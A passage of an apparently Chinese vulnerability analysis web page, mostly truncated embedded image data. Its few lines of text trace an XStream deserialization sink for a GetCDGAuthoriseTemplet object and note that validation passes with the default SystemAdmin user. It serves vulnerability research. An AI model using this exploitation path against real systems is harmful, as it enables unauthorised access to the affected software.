<img src="data:image/png;base64,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
<p blockindex=16>GetCDGAuthoriseTemplet gcat = (GetCDGAuthoriseTemplet)this.xStream.fromXML(toServerXML);<br>
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABRsAAAOgCAYAAAC9ZqE8AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOzdd3hU14H///edGUmod5DoiF4kescUG2MbG9x7t2Onbtpmf8nufpNsdtN+3yS7G8dJbCcuieO44QLYFGPTexeiSCCEei+ot5l7v3+oC5UZMYDsfF7P4+dhZs4999x7zx08H865x1i0ZJmFiIiIiIiIiIiIyGWyXesGiIiIiIiIiIiIyBeDwkYRERERERERERHxCoWNIiIiIiIiIiIi4hUKG0VERERERERERMQrFDaKiIiIiIiIiIiIVyhsFBEREREREREREa9wREeEXes2iIiIiIiIiIiIyBeAIyMj41q3QURERERERERERL4AHAHBod1+WFNZTn19/VVsjoiIiIiIiIiIiHxe6ZmNIiIiIiIiIiIi4hUKG0VERERERERERMQrFDaKiIiIiIiIiIiIVyhsFBEREREREREREa9Q2CgiIiIiIiIiIiJeobBRREREREREREREvEJho4iIiIiIiIiIiHiFwkYRERERERERERHxCoWNIiIiIiIiIiIi4hUKG0VERERERERERMQrFDaKiIiIiIiIiIiIVyhsFBEREREREREREa9wXOkd2HwCCRq6iICYmfgEDASgsaaQmvwjVGXvxmysvtJNEBERERERERERkavgyoWNhp3IyY8QFf8UlgFVBUnUVhUB4Bs0mJj5N2FYUJz0CiWn/gaW64o1RURERERERERERK68KxI22nyDGLr0V/hFTCA38Q1KL2zDMjuGiYbNTsSoZcQkPEHg4Hlkb/8XzIaqK9Ec8YAxIJCAxiqqXca1bop4ka6riIiIiIiIiFwNxqIly6zuPqypLKe+vt7DGu0Mv/F57AGDuLDjlzTUFPdY3DcgilFLfoCrpoDMLd9we4Sjb8xsbr5xOqOGDCE6yElFYQ4pB7aw5WAmNVZboDLypm9w/7TA1teuugqKC/LIS09k94E0qq2uw5cBw+Zz87KpjBo6mCj/esoKczi7/1O2HM6itpttAmc+yNeXD+HCxud590SdW8fhDssKYt5jX2du8Rqe23jea/Veup/R3POTr7Og9CN++tvPKDO8E0xZw5bzjYdmEtRDGeeZD/nNuhSv7O9yXIlz7RM9haU3LWH6iEGEBZhUlOaSevAzNu9J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
<p blockindex=17>继续分析漏洞点,使用<code>XStream</code>库将名为<code>toServerXML</code>的XML字符串解析成<code>GetCDGAuthoriseTemplet</code>类型的Java对象并将这个对象赋值给名为<code>gcat</code>的变量</p>
<p blockindex=18><img src="data:image/png;base64,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
<p blockindex=19>跟进代码发现调⽤validateInfo对其进⾏检查验证用户ID<code>userId</code>和密级ID<code>secretLevelId</code>的有效性进入else需要返回true才行所以我们要知道一个一定存在用户名默认系统用户为SystemAdmin</p>
<p blockindex=20><img src="data:image/png;base64,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